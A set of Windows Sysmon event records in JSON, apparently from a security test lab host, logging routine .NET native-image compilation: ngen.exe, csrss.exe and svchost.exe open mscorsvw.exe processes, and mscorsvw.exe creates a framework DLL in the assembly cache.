{"EventTime":"2020-08-01 08:07:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8134,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:06.975\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AA-5F25-0000-0010F1551000}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:06.975","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AA-5F25-0000-0010F1551000}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8135,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:06.975\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AA-5F25-0000-0010F1551000}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:06.975","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AA-5F25-0000-0010F1551000}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8136,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:06.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22AA-5F25-0000-0010F1551000}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:06.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22AA-5F25-0000-0010F1551000}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8137,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:07.037\r\nProcessGuid: {41C8662E-22AA-5F25-0000-0010F1551000}\r\nProcessId: 5084\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13dc-0\\System.Web.DynamicData.Design.dll\r\nCreationUtcTime: 2020-08-01 08:07:07.037","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:07.037","ProcessGuid":"{41C8662E-22AA-5F25-0000-0010F1551000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13dc-0\\System.Web.DynamicData.Design.dll","CreationUtcTime":"2020-08-01 08:07:07.037","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8138,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.069\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-227B-5F25-0000-001075C50E00}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.069","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-227B-5F25-0000-001075C50E00}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8139,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.069\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-227B-5F25-0000-001075C50E00}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.069","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-227B-5F25-0000-001075C50E00}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8140,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.084\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-0010755A1000}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.084","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-0010755A1000}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8141,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.131\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228B-5F25-0000-001059250F00}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.131","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228B-5F25-0000-001059250F00}","TargetProcessId":"748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8142,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.131\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228B-5F25-0000-001059250F00}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.131","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228B-5F25-0000-001059250F00}","TargetProcessId":"748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
